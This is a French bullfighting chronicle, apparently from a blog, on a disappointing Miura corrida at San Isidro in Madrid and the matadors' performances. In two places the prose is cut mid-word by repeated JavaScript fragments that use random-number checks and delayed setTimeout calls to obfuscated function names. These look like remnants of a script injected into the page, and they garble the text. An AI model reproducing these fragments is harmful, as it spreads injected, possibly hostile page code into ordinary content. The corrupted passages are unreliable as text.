MIURA, LA DÉCEPTION

San Isidro, 25ème corrida. Des six toros, deux furent renvoyés, pour faiblesse notoire. En plus, toute la corrida, à l’exception du 4ème, était présentée à l’ancienne : elle tournait autour des 500 kilos. De surcroît elle offrait des cornes qui n’avaient pas grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and-chose à voir avec ces cornes immenses qui sont du goût de Las Ventas de nos jours. Conclusion : les toros toristes ont échoué à Madrid, à de rares exceptions, comme les corridas de Rehuelga –encaste santacoloma- et Alcurrucen –Nuñez- que l’on n’avait jamais considérées comme toristes.

Pire encore, les deux toros remplaçants des titulaires, un de Buenavista et un autre de El Ventorrillo –tous deux d’encaste Domecq- eurent beaucoup de présence, généreux dans leurs armures et ils furent braves. Avec eux, Davila Miura eut une prestation contrastée, en dessous du « buenavista », il fit une bonne faena à celui de El Ventorrillo. Ceux du 7 ne voulurent pas voir, mais il toréa à la muleta ce dernier avec beaucoup de temple, de longueur et en se faisant plaisir. S’il avait réussi le coup d’épée il aurait coupé une oreille. Mais il le fit à la seconde tentative, d’une bonne estocade courte.

Rafaelillo et Ruben Pinar n’ont rien pu tirer de concluant devant deux lots infumables. Quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and est-ce que les toristes madrilènes comprendront que le toro-toriste qui leur plait tant est moins brave, moins vigoureux et moins bien présenté que celui que l’on appelle toro commercial ? Comme disent les mexicains, ni modo (c’est sans espoir).

Les commentaires sont fermés.